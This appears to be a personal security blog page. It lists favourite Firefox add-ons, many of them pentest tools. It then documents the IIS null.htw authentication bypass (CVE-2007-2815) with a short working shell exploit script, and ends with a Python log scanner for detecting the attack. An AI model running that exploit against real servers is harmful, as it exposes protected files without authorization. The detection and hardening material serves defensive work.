My boundary between the monotonous and adventure...


My Favorite Firefox Add-ons

I'm sharing with you the add-ons I use most in Firefox. The descriptions are behind each link, along with the download option.






IT Security and Pentest Add-ons

Passive Recon
https://addons.mozilla.org/mn/firefox/addon/passiverecon/

FoxyProxy
http://support.microsoft.com/kb/2505743

Https Everywhere
https://www.eff.org/https-everywhere

SQL Inject Me
https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me/

Access Me
https://addons.mozilla.org/mn/firefox/addon/access-me/

Xss Me
https://addons.mozilla.org/en-us/firefox/addon/xss-me/

Add N Edit Cookies
https://addons.mozilla.org/en-us/firefox/addon/add-n-edit-cookies-13793/

Add & Edit Cookies +
https://addons.mozilla.org/en-us/firefox/addon/add-n-edit-cookies-92079/

Live Http Headers
https://addons.mozilla.org/en-us/firefox/addon/live-http-headers/

Network tools (Router Status)
http://www.brothersoft.com/router-status-216375.html

Wot

https://addons.mozilla.org/es-ES/firefox/addon/wot-safe-browsing-tool/

Active Whois
https://addons.mozilla.org/es-ES/firefox/addon/active-whois-plugin-for-firefo/

WebDeveloper
https://addons.mozilla.org/es-ES/firefox/addon/web-developer/

User Agent Switcher
https://addons.mozilla.org/mn/firefox/addon/user-agent-switcher/

HackBar
https://addons.mozilla.org/mn/firefox/addon/hackbar/

FireCookie
https://addons.mozilla.org/mn/firefox/addon/firecookie

Tamper Data
https://addons.mozilla.org/mn/firefox/addon/tamper-data/

TorButton
https://addons.mozilla.org/mn/firefox/addon/torbutton

NoScript
https://addons.mozilla.org/en-us/firefox/addon/noscript/





Miscellaneous Utilities (non-security)

Adblock Plus
https://addons.mozilla.org/es-ES/firefox/addon/adblock-plus/

CoolPreviews
https://addons.mozilla.org/es-ES/firefox/addon/coolpreviews/

TooManyTabs
https://addons.mozilla.org/en-us/firefox/addon/toomanytabs-saves-your-memory/

Picnik
https://addons.mozilla.org/es-ES/firefox/addon/picnik/

Pixlr Grabber
https://addons.mozilla.org/es-ES/firefox/addon/pixlr-grabber/

Image Zoom
https://addons.mozilla.org/es-ES/firefox/addon/image-zoom/

Flash Got
https://addons.mozilla.org/es-ES/firefox/addon/flashgot/

DownThemAll
https://addons.mozilla.org/es-ES/firefox/addon/downthemall/

Download Status Bar
https://addons.mozilla.org/es-ES/firefox/addon/download-statusbar/

ColorZilla
https://addons.mozilla.org/es-ES/firefox/addon/colorzilla/

Febe (Backup Firefox extensions)
https://addons.mozilla.org/mn/firefox/addon/febe/

Reminder Fox
https://addons.mozilla.org/mn/firefox/addon/reminderfox

Capture Fox
https://addons.mozilla.org/mn/firefox/addon/capture-fox/


While pentesting a web server I came across an old problem I was not aware of, so I am documenting in this post the information needed to exploit it.

Microsoft IIS ntlm and basic auth bypass
You can protect your web contents by adding ntfs acls, then you will be secure.
But you can protect your web contents by the Internet Information basic/ntlm authentication, then this will be bypassed with null.htw object.

Both authentications seem to be the same, but really the object null.htw let users get any file in web directory, only if it is protected by the filesystem, will be secure.

In the exploit you can see how to use the null.htw object.

Code:


#!/bin/sh
#
# NTLM && BASIC AUTH BYPASS :)
#
# sha0[at]badchecksum.net
# Based on my adv: http://www.securityfocus.com/bid/24105/info
# (CVE-2007-2815)

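# Both arguments are required: the site base URL and the protected path.
if [ $# -ne 2 ]
then
    printf "USAGE:\t\t$0 <site> <protectedObject>\nExample:\t$0 http://www.microsoft.com /en/us/default.aspx\n\n"
    exit 0
fi

site=$1
protectedObject=$2
# The protected object is requested through null.htw instead of directly.
variabledatos=$site'/shao/null.htw?CiWebhitsfile='$protectedObject'&CiRestriction=b&CiHiliteType=full'
lynx -dump "$variabledatos"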



Source: badchecksum.net
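The defender's side of the request above, as an added example that is not part of the original post or the advisory: a scan of IIS W3C extended logs for `.htw` requests that carry a `CiWebhitsfile` parameter. The log lines are constructed, and the function name and the column set in the `#Fields:` header are assumptions of this example.

```python
from urllib.parse import parse_qs, unquote

# Constructed sample of an IIS W3C extended log (not from a real server).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services
#Fields: date time c-ip cs-username cs-method cs-uri-stem cs-uri-query sc-status
2007-05-24 10:01:02 192.0.2.10 - GET /default.aspx - 401
2007-05-24 10:01:09 192.0.2.10 - GET /x/null.htw CiWebhitsfile=/private/report.aspx&CiRestriction=b&CiHiliteType=full 200
2007-05-24 10:02:30 198.51.100.7 - GET /docs/NULL.HTW ciwebhitsfile=%2Fadmin%2Fweb.config&CiRestriction=a 404
2007-05-24 10:03:00 203.0.113.5 alice GET /search/query.htw CiRestriction=b 200
"""


def find_webhits_requests(log_text):
    """Return one dict per request asking a .htw object to render a file."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the rows that follow
            continue
        if not line.strip() or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        stem = unquote(row.get("cs-uri-stem", "")).lower()
        if not stem.endswith(".htw"):
            continue
        # Compare parameter names in lower case so mixed-case variants
        # are not missed; parse_qs also decodes %-escapes in the value.
        query = parse_qs(row.get("cs-uri-query", ""))
        params = {name.lower(): values[0] for name, values in query.items()}
        target = params.get("ciwebhitsfile")
        if target is None:
            continue
        hits.append({
            "client": row.get("c-ip"),
            "user": row.get("cs-username"),
            "target": target,
            # A 200 means the server answered with content for that target.
            "served": row.get("sc-status") == "200",
        })
    return hits


if __name__ == "__main__":
    for hit in find_webhits_requests(SAMPLE_LOG):
        print(hit)
```

A hit with `served` set and `user` equal to `-` on a path that normally answers 401 is the pattern to review first; the fix described in the advisory text is to restrict the files with NTFS ACLs rather than relying on IIS authentication alone.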